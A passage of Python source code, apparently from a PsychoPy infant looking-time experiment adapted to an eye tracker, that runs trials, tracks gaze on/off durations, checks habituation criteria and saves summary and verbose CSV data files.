badTrialTrials:\n                    self.trialText.text = "Trial no. " + str(trialNum) + " (" + str(\n                        badTrialTrials.count(trialNum) + 1) + "x)"\n                else:\n                    self.trialText.text = "Trial no. " + str(trialNum)\n            else:\n                self.trialText.text = "Trial no. " + str(trialNum)\n            self.statusSquareA.fillColor = 'black'\n            self.statusSquareB.fillColor = 'black'\n            trialType = self.actualTrialOrder[trialNum - 1]\n            while '.' 
in trialType:\n trialType = trialType[trialType.index('.')+1:]\n # select movie for trial\n if self.stimPres:\n if self.counters[trialType] >= len(self.stimNames[trialType]): # Comes up with multiple repetitions of few movies\n self.stimName = self.stimNames[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n disMovie = self.stimDict[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n else:\n self.stimName = self.stimNames[trialType][self.counters[trialType]]\n disMovie = self.stimDict[trialType][self.counters[trialType]]\n self.counters[trialType] += 1\n else:\n disMovie = 0\n if self.blindPres < 1:\n self.rdyTextAppend = \" NEXT: \" + self.actualTrialOrder[trialNum - 1] + \" TRIAL\"\n end = False\n skip = False\n if trialType not in AA and self.nextFlash in [1,'1',True,'True']: # The 'flasher' to alert the experimenter they need to start the next trial\n self.flashCoderWindow()\n while not self.keyboard[self.key.A] and trialType not in AA and not end: # wait for 'ready' key, check at frame intervals\n if self.keyboard[self.key.Y]:\n end = True\n elif self.keyboard[self.key.R] and not didRedo:\n if self.stimPres:\n if self.counters[trialType] > 0:\n self.counters[trialType] -= 1\n [disMovie,trialNum] = self.redoSetup(trialNum, AA) #This returns a new value for DisMovie and trialNum\n if self.stimPres:\n if disMovie['stimType'] == 'Movie':\n disMovie['stim'].loadMovie(disMovie['stim'].filename) # \"Seek\" causes audio bugs. This just reloads the movie. More memory load, but reliable.\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n didRedo = True\n elif self.keyboard[self.key.J] and self.habMetWhen == -1 and 'Hab' in self.trialOrder: # jump to test in a hab design\n [disMovie, trialType] = self.jumpToTest(trialNum)\n elif self.actualTrialOrder[trialNum-1][0:3] not in ['Hab', 'hab'] and self.keyboard[self.key.I] and 'Hab' in self.trialOrder and self.habMetWhen > 0: # insert additional hab trial\n [disMovie, trialType] = self.insertHab(trialNum)\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n elif trialNum > 1 and not self.stimPres and self.keyboard[self.key.P] and not reviewed: # Print data so far, as xHab. Non-stimulus version only. 
Only between trials.\n reviewed = True\n print(\"hab crit, on-timeA, numOnA, offtimeA, numOffA, onTimeB, numOnB, offTimeB, numOffB\")\n print(\"-------------------------------------------------------------------------------------------\")\n for i in range(0, len(self.dataMatrix)):\n dataList = [self.dataMatrix[i]['habCrit'], self.dataMatrix[i]['sumOnA'],\n self.dataMatrix[i]['numOnA'], self.dataMatrix[i]['sumOffA'],\n self.dataMatrix[i]['numOffA'], self.dataMatrix[i]['sumOnB'],\n self.dataMatrix[i]['numOnB'], self.dataMatrix[i]['sumOffB'],\n self.dataMatrix[i]['numOffB']]\n print(dataList)\n self.readyText.text = \"No trial active\" + self.rdyTextAppend\n self.dispCoderWindow()\n if not end: #This if statement checks if we're trying to quit.\n self.frameCount = 0\n # framerate = win.getActualFrameRate()\n # print(framerate) #just some debug code.\n if self.blindPres < 2:\n self.readyText.text = \"Trial active\"\n if trialType not in AA: # Blank coder window if not auto-advancing\n self.dispCoderWindow(0)\n if self.stimPres:\n if trialType in self.playAttnGetter: #Shockingly, this will work.\n self.attnGetter(trialType) # plays the attention-getter\n core.wait(.1) # this wait is important to make the attentiongetter not look like it is turning into the stimulus\n self.frameCount = 0\n irrel = self.dispTrial(0, disMovie)\n core.wait(self.freezeFrame) # this delay ensures that the trial only starts after the images have appeared on the screen, static, for 200ms\n waitStart = True\n else:\n self.frameCount = 0\n waitStart = True\n else:\n if trialType in self.playAttnGetter:\n core.wait(self.attnGetterList[self.playAttnGetter[trialType]]['stimDur'] + self.freezeFrame) # an attempt to match the delay caused by the attention-getter playing.\n waitStart = True\n else:\n waitStart = True\n while waitStart and trialType not in AA and not end: # Wait for first gaze-on\n if self.keyboard[self.key.Y]: # End experiment right there and then.\n end = True\n elif self.keyboard[self.key.A]:\n self.dispCoderWindow(0)\n if self.stimPres:\n if trialType in self.playAttnGetter:\n self.attnGetter(trialType)\n core.wait(.1)\n irrel = self.dispTrial(0, disMovie)\n core.wait(self.freezeFrame)\n else:\n if trialType in self.playAttnGetter:\n core.wait(self.attnGetterList[self.playAttnGetter[trialType]]['stimDur'] + self.freezeFrame) # an attempt to match the delay caused by the attention-getter playing.\n elif self.lookKeysPressed():\n waitStart = False\n self.dispCoderWindow(trialType)\n elif self.keyboard[self.key.R] and not didRedo: # Redo last trial, mark last trial as bad\n if self.counters[trialType] > 0:\n self.counters[trialType] -= 1\n [disMovie, trialNum] = self.redoSetup(trialNum, AA) # This returns a new value for DisMovie and trialNum\n if disMovie['stimType'] == 'Movie':\n disMovie['stim'].loadMovie(disMovie['stim'].filename)\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n didRedo = True\n elif self.keyboard[self.key.J] and 'Hab' in self.trialOrder and self.habMetWhen == -1: # jump to test in a hab design.\n [disMovie,trialType] = self.jumpToTest(trialNum)\n elif self.keyboard[self.key.I] and self.habMetWhen > 0: # insert additional hab trial\n [disMovie,trialType] = self.insertHab(trialNum)\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n elif self.keyboard[self.key.S] and trialType != 'Hab' and '^' not in trialType: # Skip trial. 
Doesn't work on things required for habituation.\n                    skip = True\n                else:\n                    self.dispCoderWindow(0)\n            if not end and not skip:  # If Y (quit) has not been pressed and we're not skipping, do the trial!\n                x = self.doTrial(trialNum, self.actualTrialOrder[trialNum - 1], disMovie)  # the actual trial, returning one of four status values at the end\n                AA = self.autoAdvance  # After the very first trial AA will always be just the autoadvance list.\n            elif skip:\n                x = 0  # Simply proceed to next trial.\n            else:\n                x = 2\n            if x == 2:  # end experiment, either due to final trial ending or 'end experiment altogether' button.\n                runExp = False\n                didRedo = False\n                self.endExperiment()\n            elif x == 3:  # bad trial, redo!\n                trialNum = trialNum\n                didRedo = True\n                if self.stimPres:\n                    self.dummyThing.draw()\n                    self.win.flip() #Blank the screen.\n                    self.counters[trialType] -= 1\n                    if self.counters[trialType] < 0:\n                        self.counters[trialType] = 0\n            elif x == 1:  # end hab block!\n                tempNum = self.maxHabIndex\n                # trialNum is in fact the index after the current trial at this point\n                # so we can just erase everything between that and the first non-hab trial.\n                del self.actualTrialOrder[trialNum:tempNum + 1]  # oddly, the del function does not erase the final index.\n                trialNum += 1\n                trialType = self.actualTrialOrder[trialNum - 1]  # No need to check for hab sub-trials.\n                if self.blindPres == 0:\n                    self.rdyTextAppend = " NEXT: " + trialType + " TRIAL"\n                didRedo = False\n            elif x == 0:  # continue hab/proceed as normal\n                trialNum += 1\n                trialType = self.actualTrialOrder[trialNum - 1]\n                while '.' in trialType:\n                    trialType = trialType[trialType.index('.') + 1:]\n                if not self.blindPres:\n                    self.rdyTextAppend = " NEXT: " + trialType + " TRIAL"\n                didRedo = False\n\n    def lookKeysPressed(self):\n        """\n        A simple boolean function to allow for more modularity with preferential looking.\n        Basically, allows you to set an arbitrary condition to start a trial once the attngetter has played.\n        In this version, the trial starts when the eye tracker reports gaze on the screen (see lookingLeap).\n\n        :return: True if gaze is currently detected, False otherwise.\n        :rtype: bool\n        """\n        return self.lookingLeap()\n\n    #VM ADDED\n    def lookingLeap(self):\n        """\n        Polls the eye tracker for the current gaze position. The tracker reports NaN coordinates when\n        no gaze is detected, so any valid (non-NaN) position counts as gaze-on.\n\n        :return: True if the tracker currently reports a valid gaze position, False otherwise.\n        :rtype: bool\n        """\n        currentGazePosition = self.controller.get_current_gaze_position()\n        # np.isnan is used rather than 'np.nan in ...' because NaN never compares equal to itself,\n        # so a membership test can miss NaN values that are not the exact same object.\n        return not np.any(np.isnan(currentGazePosition))\n\n    def doTrial(self, number, ttype, disMovie):\n        """\n        Control function for individual trials, to be called by doExperiment\n        Returns a status value (int) that tells doExperiment what to do next\n\n        :param number: Trial number\n        :type number: int\n        :param ttype: Trial type\n        :type ttype: string\n        :param disMovie: A dictionary as follows {'stim':[psychopy object for stimulus presentation], 'stimType':[movie,image,audio, pair]}\n        :type disMovie: dictionary\n        :return: int, 0 = proceed to next trial, 1 = hab crit met, 2 = end experiment, 3 = trial aborted\n        :rtype:\n        """\n        self.trialText.text = "Trial no. " + str(number)\n        habTrial = False  # Just for tracking if this is part of a habituation\n        localType = deepcopy(ttype)\n        while '.' in localType:\n            localType = localType[localType.index('.')+1:]\n        if ttype[0:3] == 'hab' and '.' in ttype:  # Hab sub-trials. Hard to ID definitively, actually.\n            spliceType = ttype[ttype.index('.')+1:]\n            if '.' 
in spliceType:\n spliceType = spliceType[0:spliceType.index('.')] # Isolate the part between '.'s, which will be what shows up in habtriallist.\n if spliceType in self.habTrialList:\n dataType = 'hab' + ttype[ttype.index('.'):] # Collapses down the number and ^ markings for the data file\n habTrial = True\n else:\n dataType = ttype\n elif len(self.habTrialList) == 0 and ttype == 'Hab':\n dataType = ttype\n habTrial = True\n else:\n dataType = ttype\n self.frameCount = 0 # reset display\n self.pauseCount = 0 # needed for ISI\n # returns 0 if do next trial, 1 if end hab, 2 if end experiment, 3 if abort/abort\n if self.stimPres and disMovie['stimType'] == 'Movie':\n disMovie['stim'].seek(0.0)\n disMovie['stim'].pause()\n startTrial = core.getTime()\n startTrial2 = core.getTime()\n onArray = []\n offArray = []\n onArray2 = []\n offArray2 = []\n numOn = 0\n numOff = 0\n sumOn = 0\n sumOn2 = 0\n numOff2 = 0\n numOn2 = 0\n abort = False\n runTrial = True\n endFlag = False\n self.readyText.text = \"Trial running\"\n if self.lookingLeap():\n gazeOn = True\n startOn = 0 # we want these to be 0 because every other time is put in reference to the startTrial timestamp so it's not some absurd number\n numOn = 1\n else:\n gazeOn = False\n numOff = 1\n startOff = 0\n if self.keyboard[self.secondKey]:\n gazeOn2 = True\n startOn2 = 0\n numOn2 = 1\n else:\n gazeOn2 = False\n numOff2 = 1\n startOff2 = 0\n while runTrial: # runTrial is the key boolean that actually ends the trial. Need an 'end flag' to work with.\n if self.keyboard[self.key.R]: # 'abort trial' is pressed\n abort = True\n runTrial = False\n endTrial = core.getTime() - startTrial\n # determine if they were looking or not at end of trial and update appropriate array\n if gazeOn:\n onDur = endTrial - startOn\n # Current format: Trial number, type, start of event, end of event, duration of event.\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endTrial, 'duration':onDur}\n onArray.append(tempGazeArray)\n else:\n offDur = endTrial - startOff\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endTrial, 'duration':offDur}\n offArray.append(tempGazeArray)\n elif core.getTime() - startTrial >= .5 and self.keyboard[self.key.S] and ttype != 'Hab' and '^' not in ttype:\n # New feature: End trial and go forward manually. 
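(The S key, the same key that skips a trial between trials.) 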
Disabled for hab trials and meta-trials.\n                # Disabled for the first half-second to stop you from skipping through multiple auto-advancing trials\n                if localType in self.movieEnd:\n                    endFlag = True\n                else:\n                    runTrial = False\n                    endTrial = core.getTime() - startTrial\n                    if not self.stimPres:\n                        self.endTrialSound.play()\n                    # determine if they were looking or not at end of trial and update appropriate array\n                    if gazeOn:\n                        onDur = endTrial - startOn\n                        tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endTrial, 'duration':onDur}\n                        onArray.append(tempGazeArray)\n                    else:\n                        offDur = endTrial - startOff\n                        tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endTrial, 'duration':offDur}\n                        offArray.append(tempGazeArray)\n\n            elif self.keyboard[self.key.Y]:  # the 'end the study' button, for fuss-outs\n                runTrial = False\n                endTrial = core.getTime() - startTrial\n                # determine if they were looking or not at end of trial and update appropriate array\n                if gazeOn:\n                    onDur = endTrial - startOn\n                    tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endTrial, 'duration':onDur}\n                    onArray.append(tempGazeArray)\n                else:\n                    offDur = endTrial - startOff\n                    tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endTrial, 'duration':offDur}\n                    offArray.append(tempGazeArray)\n                if len(onArray) == 0:\n                    onArray.append({'trial':0, 'trialType':0, 'startTime':0, 'endTime':0, 'duration':0})\n                if len(offArray) == 0:\n                    offArray.append({'trial':0, 'trialType':0, 'startTime':0, 'endTime':0, 'duration':0})  # keeps it from crashing while trying to write data.\n                ttype = 4  # to force an immediate quit.\n            # Now for the non-abort states.\n            elif core.getTime() - startTrial >= self.maxDur[localType] and not endFlag:  # reached max trial duration\n                if localType in self.movieEnd:\n                    endFlag = True\n                else:\n                    runTrial = False\n                    endTrial = core.getTime() - startTrial\n                    if not self.stimPres:\n                        self.endTrialSound.play()\n                    # determine if they were looking or not at end of trial and update appropriate array\n                    if gazeOn:\n                        onDur = endTrial - startOn\n                        tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endTrial, 'duration':onDur}\n                        onArray.append(tempGazeArray)\n                    else:\n                        offDur = endTrial - startOff\n                        tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endTrial, 'duration':offDur}\n                        offArray.append(tempGazeArray)\n            elif not gazeOn:  # if they are not looking as of the previous refresh, check if they have been looking away for too long\n                nowOff = core.getTime() - startTrial\n                if sumOn >= self.minOn[localType] and nowOff - startOff >= self.maxOff[localType] and self.playThrough[localType] == 0 and not endFlag:\n                    # if they have previously looked for at least minOn and have now looked away for maxOff continuous seconds\n                    if localType in self.movieEnd:\n                        endFlag = True\n                    else:\n                        runTrial = False\n                        endTrial = core.getTime() - startTrial\n                        if not self.stimPres:\n                            self.endTrialSound.play()\n                        endOff = nowOff\n                        offDur = nowOff - startOff\n                        tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endOff, 'duration':offDur}\n                        offArray.append(tempGazeArray)\n                elif self.lookingLeap():  # if they have started looking since the last refresh and not met criterion\n                    gazeOn = True\n                    numOn = numOn + 1\n                    startOn = core.getTime() - startTrial\n                    endOff = core.getTime() - startTrial\n                    # by definition, there will be a preceding 'off' section when this is 
tripped because gazeOn is set at start\n offDur = endOff - startOff\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endOff, 'duration':offDur}\n offArray.append(tempGazeArray)\n elif gazeOn:\n nowOn = core.getTime() - startTrial\n if self.playThrough[localType] == 1 and sumOn + (nowOn - startOn) >= self.minOn[localType] and not endFlag: # For trial types where the only crit is min-on.\n if localType in self.movieEnd:\n endFlag = True\n else:\n runTrial = False\n endTrial = core.getTime() - startTrial\n if not self.stimPres:\n self.endTrialSound.play()\n endOn = core.getTime() - startTrial\n onDur = endOn - startOn\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endOn, 'duration':onDur}\n onArray.append(tempGazeArray)\n if gazeOn and not self.lookingLeap(): # if they were looking and have looked away.\n gazeOn = False\n endOn = core.getTime() - startTrial\n onDur = endOn - startOn\n numOff = numOff + 1\n startOff = core.getTime() - startTrial\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endOn, 'duration':onDur}\n onArray.append(tempGazeArray)\n sumOn = sumOn + onDur\n if not gazeOn2: # if they are not looking as of the previous refresh\n nowOff2 = core.getTime() - startTrial2\n if self.keyboard[self.secondKey]: # if they have started looking since the last refresh and not met criterion\n gazeOn2 = True\n numOn2 = numOn2 + 1\n startOn2 = core.getTime() - startTrial2\n endOff2 = core.getTime() - startTrial2\n offDur2 = endOff2 - startOff2\n tempGazeArray2 = {'trial':number, 'trialType':dataType, 'startTime':startOff2, 'endTime':endOff2, 'duration':offDur2}\n offArray2.append(tempGazeArray2)\n elif gazeOn2 and not self.keyboard[self.secondKey]: # if they were looking and have looked away.\n gazeOn2 = False\n endOn2 = core.getTime() - startTrial2\n onDur2 = endOn2 - startOn2\n numOff2 = numOff2 + 1\n startOff2 = core.getTime() - startTrial2\n tempGazeArray2 = {'trial':number, 'trialType':dataType, 'startTime':startOn2, 'endTime':endOn2, 'duration':onDur2}\n onArray2.append(tempGazeArray2)\n sumOn2 = sumOn2 + onDur2\n movieStatus = self.dispTrial(localType, disMovie)\n if localType in self.movieEnd and endFlag and movieStatus >= 1:\n runTrial = False\n endTrial = core.getTime() - startTrial\n if gazeOn:\n onDur = endTrial - startOn\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endTrial, 'duration':onDur}\n onArray.append(tempGazeArray)\n else:\n offDur = endTrial - startOff\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endTrial, 'duration':offDur}\n offArray.append(tempGazeArray)\n if gazeOn2:\n onDur2 = endTrial - startOn2\n tempGazeArray2 = {'trial':number, 'trialType':dataType, 'startTime':startOn2, 'endTime':endTrial, 'duration':onDur2}\n onArray2.append(tempGazeArray2)\n else:\n offDur2 = endTrial - startOff2\n tempGazeArray2 = {'trial':number, 'trialType':dataType, 'startTime':startOff2, 'endTime':endTrial, 'duration':offDur2}\n offArray2.append(tempGazeArray2)\n # print offArray\n # print onArray2\n # print offArray2\n if habTrial:\n habDataRec = self.habCount + 1\n else:\n habDataRec = 0\n if self.stimPres:\n # Reset everything, stop playing sounds and movies.\n if disMovie['stimType'] == 'Movie':\n disMovie['stim'].seek(0.0)\n disMovie['stim'].pause()\n elif disMovie['stimType'] == 'Audio':\n disMovie['stim'].stop()\n elif disMovie['stimType'] == 'Image with audio':\n 
disMovie['stim']['Audio'].stop()\n if self.stimPres and number < len(self.actualTrialOrder):\n tmpNxt = deepcopy(self.actualTrialOrder[number])\n while '.' in tmpNxt:\n tmpNxt = tmpNxt[tmpNxt.index('.')+1:]\n if tmpNxt not in self.autoAdvance:\n self.dummyThing.draw()\n self.win.flip() # blanks the screen outright between trials if NOT auto-advancing into the next trial\n if abort: # if the abort button was pressed\n if self.stimPres and disMovie['stimType'] == 'Movie':\n disMovie['stim'].seek(0.0)\n disMovie['stim'].pause()\n self.abortTrial(onArray, offArray, number, dataType, onArray2, offArray2, self.stimName, habDataRec)\n return 3\n else:\n self.dataRec(onArray, offArray, number, dataType, onArray2, offArray2, self.stimName, habDataRec)\n if self.habMetWhen == -1 and len(self.habTrialList) > 0 and not abort: # if still during habituation\n if dataType[0:4] == 'hab.' and dataType[4:] in self.calcHabOver:\n tempSum = 0\n for c in range(0, len(onArray)):\n tempSum += onArray[c]['duration']\n self.habDataCompiled[self.habCount] += tempSum\n if '^' in ttype:\n self.habCount += 1 # Note: Occurs after data recording, making recording hab trial number hard.\n # Check if criteria need to be set or have been met\n if self.checkStop(): # If criteria met\n # Check if there are any trials FOLLOWING the hab trials.\n if self.maxHabIndex < len(self.actualTrialOrder)-1:\n return 1\n else:\n return 2 # End experiment.\n else:\n return 0\n else:\n return 0\n elif ttype == 'Hab' and self.habMetWhen == -1 and not abort:\n tempSum = 0\n for c in range(0, len(onArray)):\n tempSum += onArray[c]['duration']\n self.habDataCompiled[self.habCount] += tempSum\n self.habCount += 1\n if self.checkStop(): # If criteria met\n # Check if there are any trials FOLLOWING the hab trials.\n if self.actualTrialOrder[-1] != 'Hab':\n return 1\n else:\n return 2 # End experiment.\n else:\n return 0\n elif number >= len(self.actualTrialOrder) or ttype == 4:\n # End experiment\n return 2\n else:\n #Proceed as normal\n return 0\n\n def endExperiment(self):\n \"\"\"\n End experiment, save all data, calculate reliability if needed, close up shop. Displays \"saving data\" and\n end-of-experiment screen.\n\n :return:\n :rtype:\n \"\"\"\n tempText = visual.TextStim(self.win2, text=\"Saving data...\", pos=[0, 0], color='white', bold=True, height=40)\n tempText.draw()\n self.win2.flip()\n if self.stimPres:\n self.dummyThing.draw()\n if self.endImageObject is not None:\n self.endImageObject.draw()\n self.win.flip()\n\n # Block-level summary data. Omits bad trials.\n if len(self.blockDataList)>0:\n tempMatrix = self.saveBlockFile()\n # Now write the actual data file\n nDupe = '' # This infrastructure eliminates the risk of overwriting existing data\n o = 1\n blockfilename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(\n self.sID) + nDupe + '_BlockSumm_' + str(\n self.today.month) + str(self.today.day) + str(self.today.year) + '.csv'\n while os.path.exists(blockfilename):\n o += 1\n nDupe = str(o)\n blockfilename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(\n self.sID) + nDupe + '_BlockSumm_' + str(\n self.today.month) + str(self.today.day) + str(self.today.year) + '.csv'\n with open(blockfilename, 'w') as b:\n blockWriter = csv.DictWriter(b, fieldnames=self.dataColumns, extrasaction='ignore', lineterminator='\\n')\n blockWriter.writeheader()\n for z in range(0, len(tempMatrix)):\n blockWriter.writerow(tempMatrix[z])\n\n # If there is habituation data, create hab summary file. 
Similar to the block one, but a little easier thanks to\n # the tagging of habituation trial numbers.\n if self.habSetWhen > 0 and len(self.habTrialList) > 0: # If there's a 'Hab' trial type, the main summary file does the trick just fine.\n habMatrix = self.saveHabFile()\n # Now, actually write the file\n nDupe = '' # This infrastructure eliminates the risk of overwriting existing data\n o = 1\n habfilename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(\n self.sID) + nDupe + '_HabSumm_' + str(\n self.today.month) + str(self.today.day) + str(self.today.year) + '.csv'\n while os.path.exists(habfilename):\n o += 1\n nDupe = str(o)\n habfilename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(\n self.sID) + nDupe + '_HabSumm_' + str(\n self.today.month) + str(self.today.day) + str(self.today.year) + '.csv'\n with open(habfilename, 'w') as h:\n habWriter = csv.DictWriter(h, fieldnames=self.dataColumns, extrasaction='ignore', lineterminator='\\n')\n habWriter.writeheader()\n for z in range(0, len(habMatrix)):\n habWriter.writerow(habMatrix[z])\n\n # Shuffle together bad data and good data into the appropriate order.\n if len(self.badTrials) > 0: # if there are any redos, they need to be shuffled in appropriately.\n for i in range(0, len(self.badTrials)):\n x = 0\n while x < len(self.dataMatrix) and self.dataMatrix[x]['trial'] != self.badTrials[i]['trial']:\n x += 1\n while x < len(self.dataMatrix) and self.dataMatrix[x]['GNG'] == 0: # this is to get around the possibility that the same trial had multiple 'false starts'\n x += 1\n self.dataMatrix.insert(x, self.badTrials[i]) # python makes this stupid easy\n nDupe = '' # This infrastructure eliminates the risk of overwriting existing data\n o = 1\n filename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(self.sID) + nDupe + '_' + str(self.today.month) + str(\n self.today.day) + str(self.today.year) + '.csv'\n while os.path.exists(filename):\n o += 1\n nDupe = str(o)\n filename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(self.sID) + nDupe + '_' + str(\n self.today.month) + str(\n self.today.day) + str(self.today.year) + '.csv'\n with open(filename, 'w') as f:\n outputWriter = csv.DictWriter(f, fieldnames=self.dataColumns, extrasaction='ignore', lineterminator='\\n')\n outputWriter.writeheader()\n for r in range(0, len(self.dataMatrix)):\n # print('writing rows')\n outputWriter.writerow(self.dataMatrix[r])\n\n\n #Verbose data saving.\n verboseMatrix = []\n # first, verbose data is not as well organized. 
However, we should be able to alternate back and forth between\n # on and off until we reach the end of a given trial, to reconstruct it.\n # at the start of each line, add information: sNum, ageMo, ageDay, sex, cond, GNG, ON/OFF\n for n in range(0, len(self.verbDatList['verboseOn'])):\n self.verbDatList['verboseOn'][n].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':1, 'gazeOnOff':1})\n for m in range(0, len(self.verbDatList['verboseOff'])): # adding the details to the verbose array\n self.verbDatList['verboseOff'][m].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':1, 'gazeOnOff':0})\n if len(self.badTrials) > 0:\n for o in range(0, len(self.verbBadList['verboseOn'])):\n self.verbBadList['verboseOn'][o].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':0, 'gazeOnOff':1})\n for p in range(0, len(self.verbBadList['verboseOff'])): # same details for the bad trials\n self.verbBadList['verboseOff'][p].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':0, 'gazeOnOff':0})\n # read the final data matrix and go trial by trial.\n # print(verboseOn) #debug, to make sure verboseOn is being constructed correctly\n for q in range(0, len(self.dataMatrix)):\n tnum = self.dataMatrix[q]['trial']\n onIndex = -1\n offIndex = -1\n if self.dataMatrix[q]['GNG'] == 1: # separate for good and bad trials\n for x in range(0, len(self.verbDatList['verboseOn'])):\n if self.verbDatList['verboseOn'][x]['trial'] == tnum and onIndex == -1: # find the right index in the verbose matrices\n onIndex = x\n for y in range(0, len(self.verbDatList['verboseOff'])):\n if self.verbDatList['verboseOff'][y]['trial'] == tnum and offIndex == -1:\n offIndex = y\n trialVerbose = []\n if onIndex >= 0:\n while onIndex < len(self.verbDatList['verboseOn']):\n if self.verbDatList['verboseOn'][onIndex]['trial'] == tnum:\n trialVerbose.append(self.verbDatList['verboseOn'][onIndex])\n onIndex += 1\n if offIndex >= 0:\n while offIndex < len(self.verbDatList['verboseOff']):\n if self.verbDatList['verboseOff'][offIndex]['trial'] == tnum:\n trialVerbose.append(self.verbDatList['verboseOff'][offIndex])\n offIndex += 1\n trialVerbose2 = sorted(trialVerbose, key=lambda trialVerbose: trialVerbose['startTime']) #Sorts by \"startTime\" of each gaze event\n verboseMatrix.extend(trialVerbose2)\n elif self.dataMatrix[q]['GNG'] == 0: # bad trials.\n if q > 0 and self.dataMatrix[q - 1]['GNG'] == 0:\n pass # stops it from doubling up. 
If there is more than one consecutive bad trial, it will get all of them in a row the first time,\n else:\n trialVerbose = []\n for x in range(0, len(self.verbBadList['verboseOn'])):\n if self.verbBadList['verboseOn'][x]['trial'] == tnum and onIndex == -1:\n onIndex = x\n for y in range(0, len(self.verbBadList['verboseOff'])):\n if self.verbBadList['verboseOff'][y]['trial'] == tnum and offIndex == -1:\n offIndex = y\n if onIndex >= 0:\n while onIndex < len(self.verbBadList['verboseOn']):\n if self.verbBadList['verboseOn'][onIndex]['trial'] == tnum:\n trialVerbose.append(self.verbBadList['verboseOn'][onIndex])\n onIndex += 1\n if offIndex >= 0:\n while offIndex < len(self.verbBadList['verboseOff']):\n if self.verbBadList['verboseOff'][offIndex]['trial'] == tnum:\n trialVerbose.append(self.verbBadList['verboseOff'][offIndex])\n offIndex += 1\n trialVerbose2 = sorted(trialVerbose, key=lambda trialVerbose: trialVerbose['startTime']) # this is the magic bullet, in theory.\n verboseMatrix.extend(trialVerbose2)\n headers2 = ['snum', 'months', 'days', 'sex', 'cond', 'GNG', 'gazeOnOff', 'trial', 'trialType', 'startTime', 'endTime', 'duration']\n with open(self.verboseFolder + self.prefix + str(self.sNum) + '_' + str(self.sID) + nDupe + '_' + str(self.today.month) + str(self.today.day) + str(self.today.year) + '_VERBOSE.csv', 'w') as f:\n outputWriter2 = csv.DictWriter(f, fieldnames=headers2, extrasaction='ignore', lineterminator='\\n')\n outputWriter2.writeheader()\n for z in range(0, len(verboseMatrix)):\n outputWriter2.writerow(verboseMatrix[z])\n if len(self.verbDatList['verboseOn2']) > 0: # If there is even a single gaze-on event from coder B, save coder B data.\n verboseMatrix2 = []\n for n in range(0, len(self.verbDatList['verboseOn2'])):\n self.verbDatList['verboseOn2'][n].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':1, 'gazeOnOff':1})\n for m in range(0, len(self.verbDatList['verboseOff2'])):\n self.verbDatList['verboseOff2'][m].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':1, 'gazeOnOff':0})\n if len(self.badTrials) > 0:\n for o in range(0, len(self.verbBadList['verboseOn2'])):\n self.verbBadList['verboseOn2'][o].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':0, 'gazeOnOff':1})\n for p in range(0, len(self.verbBadList['verboseOff2'])):\n self.verbBadList['verboseOff2'][p].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':0, 'gazeOnOff':0})\n for q in range(0, len(self.dataMatrix)):\n tnum = self.dataMatrix[q]['trial']\n onIndex2 = -1\n offIndex2 = -1\n if self.dataMatrix[q]['GNG'] == 1: # separate for good and bad trials\n for x in range(0, len(self.verbDatList['verboseOn2'])):\n if self.verbDatList['verboseOn2'][x]['trial'] == tnum and onIndex2 == -1: # find the right index in the verbose matrices\n onIndex2 = x\n for y in range(0, len(self.verbDatList['verboseOff2'])):\n if self.verbDatList['verboseOff2'][y]['trial'] == tnum and offIndex2 == -1:\n offIndex2 = y\n trialVerbose = []\n if onIndex2 >= 0:\n while onIndex2 < len(self.verbDatList['verboseOn2']):\n if self.verbDatList['verboseOn2'][onIndex2]['trial'] == tnum:\n trialVerbose.append(self.verbDatList['verboseOn2'][onIndex2])\n onIndex2 += 1\n if offIndex2 >= 0:\n while offIndex2 < len(self.verbDatList['verboseOff2']):\n if self.verbDatList['verboseOff2'][offIndex2]['trial'] == tnum:\n 
